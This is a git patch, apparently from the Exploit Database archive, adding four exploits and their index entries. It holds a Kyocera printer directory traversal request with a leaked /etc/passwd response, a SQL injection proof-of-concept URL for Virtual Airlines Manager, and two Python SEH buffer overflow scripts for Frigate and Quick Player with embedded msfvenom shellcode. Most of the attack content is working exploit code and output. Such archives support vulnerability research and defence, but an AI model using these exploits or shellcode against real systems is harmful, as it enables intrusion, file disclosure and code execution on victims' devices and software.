From 590364ca2a0a3e3251b312f456260d3781fc13db Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 9 Jun 2020 05:02:04 +0000 Subject: [PATCH] DB: 2020-06-09 4 changes to exploits/shellcodes Frigate 3.36.0.9 - 'Command Line' Local Buffer Overflow (SEH) (PoC) Quick Player 1.3 - '.m3l' Buffer Overflow (Unicode & SEH) Kyocera Printer d-COPIA253MF - Directory Traversal (PoC) Virtual Airlines Manager 2.6.2 - 'notam' SQL Injection --- exploits/hardware/webapps/48561.txt | 68 ++++++++++++++++++++++ exploits/php/webapps/48562.txt | 23 ++++++++ exploits/windows/local/48563.py | 70 ++++++++++++++++++++++ exploits/windows/local/48564.py | 90 +++++++++++++++++++++++++++++ files_exploits.csv | 4 ++ 5 files changed, 255 insertions(+) create mode 100644 exploits/hardware/webapps/48561.txt create mode 100644 exploits/php/webapps/48562.txt create mode 100755 exploits/windows/local/48563.py create mode 100755 exploits/windows/local/48564.py diff --git a/exploits/hardware/webapps/48561.txt b/exploits/hardware/webapps/48561.txt new file mode 100644 index 000000000..b053e1597 --- /dev/null +++ b/exploits/hardware/webapps/48561.txt @@ -0,0 +1,68 @@ +# Exploit Title : Kyocera Printer d-COPIA253MF - Directory Traversal (PoC) +# Exploit Author: Hakan Eren ŞAN +# Date: 2020-06-06 +# Vendor Homepage: https://www.kyoceradocumentsolutions.com.tr/tr.html +# Version: d-COPIA253MF plus +# Tested on : Linux +# Credit: Berat Isler + + +# First step , you can capture the main page +# Then create a directory traveral payload like ../../../ this +# Then you add nullbyte to the end of the payload(%00) +# Last step sent your request + +This is the code : + +Request: + + +GET /wlmeng/../../../../../../../../../../../etc/passwd%00index.htm HTTP/1.1 +Host: X.X.X.X +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) +Gecko/20100101 Firefox/76.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: rtl=0 +Upgrade-Insecure-Requests: 1 +If-None-Match: "/wlmeng/index.htm, Thu, 04 Jun 2020 13:41:16 GMT" +Cache-Control: max-age=0 + + +Response: + +HTTP/1.1 200 OK +Content-Length: 843 +Date: Thu, 04 Jun 2020 16:09:54 GMT +Server: KM-MFP-http/V0.0.1 +Last-Modified: Thu, 04 Jun 2020 13:41:16 GMT +ETag: "/wlmeng/../../../../../../../../../../../etc/passwd, Thu, 04 Jun +2020 13:41:16 GMT" +Content-Type: text/html + +root::0:0:root:/root:/bin/sh +bin:*:1:1:bin:/bin:/bin/sh +daemon:*:2:2:daemon:/usr/sbin:/bin/sh +sys:*:3:3:sys:/dev:/bin/sh +adm:*:4:4:adm:/var/adm:/bin/sh +lp:*:5:7:lp:/var/spool/lpd:/bin/sh +sync:*:6:8:sync:/bin:/bin/sync +shutdown:*:7:9:shutdown:/sbin:/sbin/shutdown +halt:*:8:10:halt:/sbin:/sbin/halt +mail:*:9:11:mail:/var/mail:/bin/sh +news:*:10:12:news:/var/spool/news:/bin/sh +uucp:*:11:13:uucp:/var/spool/uucp:/bin/sh +operator:*:12:0:operator:/root:/bin/sh +games:*:13:60:games:/usr/games:/bin/sh +ftp:*:15:14:ftp:/var/ftp:/bin/sh +man:*:16:20:man:/var/cache/man:/bin/sh +www:*:17:18:www-data:/var/www:/bin/sh +sshd:*:18:19:sshd:/var/run/sshd:/bin/sh +proxy:*:19:21:proxy:/bin:/bin/sh +telnetd:*:20:22:proxy:/bin:/bin/sh +backup:*:34:34:backup:/var/backups:/bin/sh +ais:*:101:101:ais:/var/run/ais:/bin/sh +nobody:*:65534:65534:nobody:/nonexistent:/bin/sh \ No newline at end of file diff --git a/exploits/php/webapps/48562.txt b/exploits/php/webapps/48562.txt new file mode 100644 index 000000000..10c1394f9 --- /dev/null +++ b/exploits/php/webapps/48562.txt @@ -0,0 +1,23 @@ +# Exploit Title: Virtual Airlines Manager 2.6.2 - 'notam' SQL Injection +# Date: 2020-06-07 +# Exploit Author: Pankaj Kumar Thakur +# Vendor Homepage: http://virtualairlinesmanager.net/ +# Dork: inurl:notam_id= +# Affected Version: 2.6.2 +# Tested on: Ubuntu +# CVE : N/A + +Vulnerable parameter +------------------- +notam_id=%27%27 + +Id parameter's value is going into sql query directly! + +Proof of concept +--------------- +https://localhost:8080/vam/index.php?page=notam¬am_id=11%27%27 + + +Submitted: Jun 1 2020 +Fixed: Jun 5 2020 +Acknowledgement : https://ibb.co/Y3WYdFN \ No newline at end of file diff --git a/exploits/windows/local/48563.py b/exploits/windows/local/48563.py new file mode 100755 index 000000000..4aad4c2a0 --- /dev/null +++ b/exploits/windows/local/48563.py @@ -0,0 +1,70 @@ +# Exploit Title: Frigate 3.36.0.9 - 'Command Line' Local Buffer Overflow (SEH) (PoC) +# Vendor Homepage: http://www.frigate3.com/ +# Software Link Download: http://www.frigate3.com/download/frigate3_pro.exe +# Exploit Author: Paras Bhatia +# Discovery Date: 2020-06-07 +# Vulnerable Software: Frigate +# Version: <= 3.36.0.9 +# Vulnerability Type: Local Buffer Overflow +# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English) + +#Steps to Produce the Crash: + +# 1.- Run python code: FrigateLCE.py +# 2.- Copy content to clipboard +# 3.- Turn off DEP for Frigate3.exe +# 4.- Open "Frigate3.exe" +# 5.- Go to "Command" > "Command Line" > "Activate Command Line" +# 6.- Paste ClipBoard into the "Command Line" field which appears at the bottom of the Frigate application. +# 7.- Press Enter from Keyboard. +# 7.- Click on OK in the dialog box that appears. +# 8.- Calc.exe runs. + + +################################################################################################################################################# + +#Python "FrigateLCE.py" Code: + +f= open("FrigateLCE.txt", "w") + +junk="A" * 4112 + +nseh="\xeb\x20\x90\x90" + +seh="\x4B\x0C\x01\x40" + +#40010C4B 5B POP EBX +#40010C4C 5D POP EBP +#40010C4D C3 RETN +#POP EBX ,POP EBP, RETN | [rtl60.bpl] (C:\Program Files\Frigate3\rtl60.bpl) + +nops="\x90" * 50 + +# msfvenom -a x86 --platform windows -p windows/exec CMD=calc -e x86/alpha_mixed -b "\x00\x14\x09\x0a\x0d" -f python + +buf = "" +buf += "\xbf\xe3\xfa\x7b\x97\xdb\xd5\xd9\x74\x24\xf4\x5d\x2b" +buf += "\xc9\xb1\x30\x83\xed\xfc\x31\x7d\x0f\x03\x7d\xec\x18" +buf += "\x8e\x6b\x1a\x5e\x71\x94\xda\x3f\xfb\x71\xeb\x7f\x9f" +buf += "\xf2\x5b\xb0\xeb\x57\x57\x3b\xb9\x43\xec\x49\x16\x63" +buf += "\x45\xe7\x40\x4a\x56\x54\xb0\xcd\xd4\xa7\xe5\x2d\xe5" +buf += "\x67\xf8\x2c\x22\x95\xf1\x7d\xfb\xd1\xa4\x91\x88\xac" +buf += "\x74\x19\xc2\x21\xfd\xfe\x92\x40\x2c\x51\xa9\x1a\xee" +buf += "\x53\x7e\x17\xa7\x4b\x63\x12\x71\xe7\x57\xe8\x80\x21" +buf += "\xa6\x11\x2e\x0c\x07\xe0\x2e\x48\xaf\x1b\x45\xa0\xcc" +buf += "\xa6\x5e\x77\xaf\x7c\xea\x6c\x17\xf6\x4c\x49\xa6\xdb" +buf += "\x0b\x1a\xa4\x90\x58\x44\xa8\x27\x8c\xfe\xd4\xac\x33" +buf += "\xd1\x5d\xf6\x17\xf5\x06\xac\x36\xac\xe2\x03\x46\xae" +buf += "\x4d\xfb\xe2\xa4\x63\xe8\x9e\xe6\xe9\xef\x2d\x9d\x5f" +buf += "\xef\x2d\x9e\xcf\x98\x1c\x15\x80\xdf\xa0\xfc\xe5\x10" +buf += "\xeb\x5d\x4f\xb9\xb2\x37\xd2\xa4\x44\xe2\x10\xd1\xc6" +buf += "\x07\xe8\x26\xd6\x6d\xed\x63\x50\x9d\x9f\xfc\x35\xa1" +buf += "\x0c\xfc\x1f\xc2\xd3\x6e\xc3\x05" + + + + +payload = junk + nseh + seh + nops + buf + +f.write(payload) +f.close \ No newline at end of file diff --git a/exploits/windows/local/48564.py b/exploits/windows/local/48564.py new file mode 100755 index 000000000..14c4c2602 --- /dev/null +++ b/exploits/windows/local/48564.py @@ -0,0 +1,90 @@ +# Exploit Title: Quick Player 1.3 - '.m3l' Buffer Overflow (Unicode & SEH) +# Date: 2020-06-05 +# Author: Felipe Winsnes +# Software Link: http://download.cnet.com/Quick-Player/3640-2168_4-10871418.html +# Version: 1.3 +# Tested on: Windows 7 + +# Proof of Concept: + +# 1.- Run the python script "poc.py", it will create a new file "poc.m3l" +# 2.- Open the application, +# 3.- Click on the bottom-right button with the letters "PL" +# 4.- Select the option "File" +# 5.- Click "Load List" +# 6.- Select poc.m3l +# 7.- Profit + +# Blog where the vulnerability is discussed: https://whitecr0wz.github.io/posts/Exploiting-Quick-Player/ +# Direct proof of the vulnerability: https://whitecr0wz.github.io/assets/img/Findings6/18.gif + +# msfvenom -p windows/messagebox TEXT=pwned! -e x86/unicode_mixed -f py EXITFUNC=thread BufferRegister=EAX +# Payload size: 640 bytes + +buf = b"" +buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49" +buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41" +buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41" +buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51" +buf += b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31" +buf += b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41" +buf += b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41" +buf += b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41" +buf += b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41" +buf += b"\x47\x42\x39\x75\x34\x4a\x42\x37\x69\x5a\x4b\x73\x6b" +buf += b"\x59\x49\x71\x64\x6f\x34\x69\x64\x70\x31\x4a\x32\x47" +buf += b"\x42\x61\x67\x6e\x51\x35\x79\x43\x34\x64\x4b\x62\x51" +buf += b"\x4c\x70\x64\x4b\x70\x76\x5a\x6c\x64\x4b\x74\x36\x4d" +buf += b"\x4c\x44\x4b\x51\x36\x4b\x58\x64\x4b\x71\x6e\x6d\x50" +buf += b"\x64\x4b\x4d\x66\x4e\x58\x70\x4f\x6b\x68\x31\x65\x4a" +buf += b"\x53\x62\x39\x49\x71\x78\x51\x79\x6f\x58\x61\x53\x30" +buf += b"\x42\x6b\x52\x4c\x6b\x74\x4f\x34\x52\x6b\x50\x45\x6d" +buf += b"\x6c\x72\x6b\x6e\x74\x4c\x68\x33\x48\x69\x71\x4a\x4a" +buf += b"\x52\x6b\x70\x4a\x6a\x78\x32\x6b\x31\x4a\x4d\x50\x6a" +buf += b"\x61\x6a\x4b\x79\x53\x6e\x54\x4e\x69\x44\x4b\x6f\x44" +buf += b"\x54\x4b\x6d\x31\x5a\x4e\x6d\x61\x39\x6f\x4e\x51\x69" +buf += b"\x30\x49\x6c\x46\x4c\x45\x34\x45\x70\x52\x54\x7a\x67" +buf += b"\x35\x71\x66\x6f\x5a\x6d\x49\x71\x77\x57\x58\x6b\x59" +buf += b"\x64\x4d\x6b\x73\x4c\x4d\x54\x6d\x58\x32\x55\x59\x51" +buf += b"\x34\x4b\x4f\x6a\x4b\x74\x4d\x31\x6a\x4b\x71\x56\x62" +buf += b"\x6b\x7a\x6c\x70\x4b\x34\x4b\x6e\x7a\x6d\x4c\x6b\x51" +buf += b"\x48\x6b\x62\x6b\x5a\x64\x44\x4b\x59\x71\x5a\x48\x52" +buf += b"\x69\x71\x34\x6d\x54\x4b\x6c\x71\x51\x46\x63\x37\x42" +buf += b"\x4c\x48\x6c\x69\x38\x54\x62\x69\x58\x65\x52\x69\x79" +buf += b"\x32\x72\x48\x44\x4e\x6e\x6e\x4c\x4e\x78\x6c\x32\x32" +buf += b"\x5a\x48\x45\x4f\x49\x6f\x49\x6f\x4b\x4f\x53\x59\x71" +buf += b"\x35\x69\x74\x77\x4b\x7a\x4f\x68\x4e\x49\x50\x51\x50" +buf += b"\x64\x47\x4b\x6c\x6c\x64\x31\x42\x49\x58\x52\x6e\x59" +buf += b"\x6f\x39\x6f\x49\x6f\x62\x69\x71\x35\x7a\x68\x33\x38" +buf += b"\x30\x6c\x52\x4c\x6b\x70\x4e\x61\x71\x58\x4d\x63\x50" +buf += b"\x32\x4e\x4e\x4f\x74\x52\x48\x71\x65\x34\x33\x32\x45" +buf += b"\x31\x62\x4e\x50\x77\x6b\x62\x68\x71\x4c\x4e\x44\x4a" +buf += b"\x6a\x52\x69\x6b\x36\x6e\x76\x79\x6f\x4f\x65\x6a\x64" +buf += b"\x55\x39\x35\x72\x72\x30\x65\x6b\x56\x48\x77\x32\x6e" +buf += b"\x6d\x75\x6c\x74\x47\x6d\x4c\x4f\x34\x62\x32\x5a\x48" +buf += b"\x51\x4f\x4b\x4f\x49\x6f\x39\x6f\x73\x38\x70\x6f\x71" +buf += b"\x68\x31\x48\x4b\x70\x53\x38\x50\x61\x4f\x77\x43\x35" +buf += b"\x71\x32\x51\x58\x30\x4d\x30\x65\x72\x53\x53\x43\x6e" +buf += b"\x51\x57\x6b\x63\x58\x6f\x6c\x6b\x74\x6a\x6a\x45\x39" +buf += b"\x39\x53\x62\x48\x71\x54\x4d\x51\x6e\x78\x6d\x50\x61" +buf += b"\x58\x70\x70\x31\x67\x32\x4e\x51\x55\x4d\x61\x69\x39" +buf += b"\x72\x68\x6e\x6c\x6d\x54\x4b\x56\x33\x59\x48\x61\x4e" +buf += b"\x51\x49\x42\x4f\x62\x30\x53\x4e\x71\x51\x42\x79\x6f" +buf += b"\x38\x50\x6e\x51\x75\x70\x32\x30\x69\x6f\x32\x35\x4c" +buf += b"\x48\x41\x41" + +alignment = "\x54\x71" # push esp, padding +alignment += "\x58\x71" # pop eax, padding +alignment += "\x05\x20\x22" # add eax, 0x22002000 +alignment += "\x71" # Padding +alignment += "\x2D\x19\x22" # sub eax, 0x22001900 +alignment += "\x71" # Padding +alignment += "\x50\x71" # push eax, padding +alignment += "\xC3" # retn + +ret = "\x71\x41" + "\xF2\x41" # 0x004100f2 : pop esi # pop ebx # ret 0x04 | startnull,unicode {PAGE_EXECUTE_READWRITE} [Quick Player.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.3.0.0 (C:\Program Files\Quick Player\Quick Player.exe) + +buffer = "A" * 536 + ret + "\x41\x71\x41\x71" + alignment + "A" * 73 + buf + "A" * 200 +f = open ("poc.m3l", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 1cf93bd8b..1a7e1ec38 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11085,6 +11085,8 @@ id,file,description,date,author,type,platform,port 48510,exploits/windows/local/48510.py,"GoldWave - Buffer Overflow (SEH Unicode)",2020-05-25,"Andy Bowden",local,windows, 48517,exploits/windows/local/48517.py,"StreamRipper32 2.6 - Buffer Overflow (PoC)",2020-05-26,"Andy Bowden",local,windows, 48543,exploits/windows/local/48543.txt,"IObit Uninstaller 9.5.0.15 - 'IObit Uninstaller Service' Unquoted Service Path",2020-06-04,Gobinathan,local,windows, +48563,exploits/windows/local/48563.py,"Frigate 3.36.0.9 - 'Command Line' Local Buffer Overflow (SEH) (PoC)",2020-06-08,"Paras Bhatia",local,windows, +48564,exploits/windows/local/48564.py,"Quick Player 1.3 - '.m3l' Buffer Overflow (Unicode & SEH)",2020-06-08,"Felipe Winsnes",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -42787,3 +42789,5 @@ id,file,description,date,author,type,platform,port 48558,exploits/multiple/webapps/48558.txt,"Cayin Digital Signage System xPost 2.5 - Remote Command Injection",2020-06-04,LiquidWorm,webapps,multiple, 48559,exploits/php/webapps/48559.txt,"Online Course Registration 1.0 - Authentication Bypass",2020-06-05,BKpatron,webapps,php, 48560,exploits/php/webapps/48560.py,"Online-Exam-System 2015 - 'feedback' SQL Injection",2020-06-05,"Gus Ralph",webapps,php, +48561,exploits/hardware/webapps/48561.txt,"Kyocera Printer d-COPIA253MF - Directory Traversal (PoC)",2020-06-08,"Hakan Eren ŞAN",webapps,hardware, +48562,exploits/php/webapps/48562.txt,"Virtual Airlines Manager 2.6.2 - 'notam' SQL Injection",2020-06-08,"Pankaj Kumar Thakur",webapps,php,